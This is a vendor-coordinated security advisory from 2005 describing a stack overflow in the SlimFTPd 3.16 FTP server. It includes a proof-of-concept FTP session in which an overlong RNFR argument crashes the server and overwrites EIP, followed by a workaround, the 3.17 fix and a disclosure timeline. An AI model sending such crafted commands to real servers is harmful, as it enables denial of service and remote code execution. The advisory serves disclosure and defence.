Arbitrary code execution in SlimFTPd v3.16 discovered by Raphaël Rigo Product: SlimFTPd by WhitSoft Development Affected Version: 3.16 (verified), <=3.16 probably too Not affected Version: 3.17 OS affected: All Win32 Risk: Critical Remote Exploit: yes URL: http://www.whitsoftdev.com/slimftpd/ Overview ======== SlimFTPd is a fully standards-compliant FTP server implementation with an advanced virtual file system. It is extremely small, but don't let its file size deceive you: SlimFTPd packs a lot of bang for the kilobyte. It is written in pure Win32 C++ with no external dependencies and no messy installer. SlimFTPd is a fully multi-threaded application that runs as a system service on Windows 98/ME or Windows NT/2K/XP, and it comes with a tool to simplify its installation or uninstallation as a system service. Once the service is started, SlimFTPd runs quietly in the background. It reads its configuration from a config file in the same folder as the executable, and it outputs all activity to a log file in the same place. The virtual file system allows you to mount any local drive or path to any virtual path on the server. This allows you to have multiple local drives represented on the server's virtual file system or just different folders from the same drive. SlimFTPd allows you to set individual permissions for server paths. Open slimftpd.conf in your favorite text editor to set up SlimFTPd's configuration. The format of SlimFTPd's config file is similar to Apache Web Server's for those familiar with Apache. Vulnerability ============= An unchecked string concatenation allows a classic stack overflow. Details : The handler for the LIST, DELE and RNFR commands builds a string by concatenating the current directory with the requested dir/file. The requested and current directory can occupy up to 512 bytes, as the destination buffer, which can therefore be overflowed. The minimal length for the current remote directory to allow exploitation is 8 chars. Risk : Critical The attacker may execute arbitrary code with the privileges of the user the server is running as. This risk is mitigated by the need to be logged in. Proof of concept : ftp> open localhost Connected to localhost. 220-SlimFTPd 3.16, by WhitSoft Development (www.whitsoftdev.com) 220-You are connecting from localhost:2687. 220 Proceed with login. User (localhost:(none)) : bleh 331 Need password for user "bleh". Password : 230 User "bleh" logged in. ftp> cd 123456789 250 "/123456789" is now current directory. ftp> quote RNFR 123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345 Connection closed. SlimFTPd crashes at eip 0x35343332. Workaround : Disable List and Write rights. Solution : Update to v3.17 ----------------------------------------------------------------------- Acknowledgments ============== Thanks to the developer for quick response and fix. Timeline ======== 2005-07-07 Discovery 2005-07-08 First attempt to contact developer 2005-07-08 Developer reply 2005-07-11 Fixed version 3.17 released 2005-07-21 Advisory published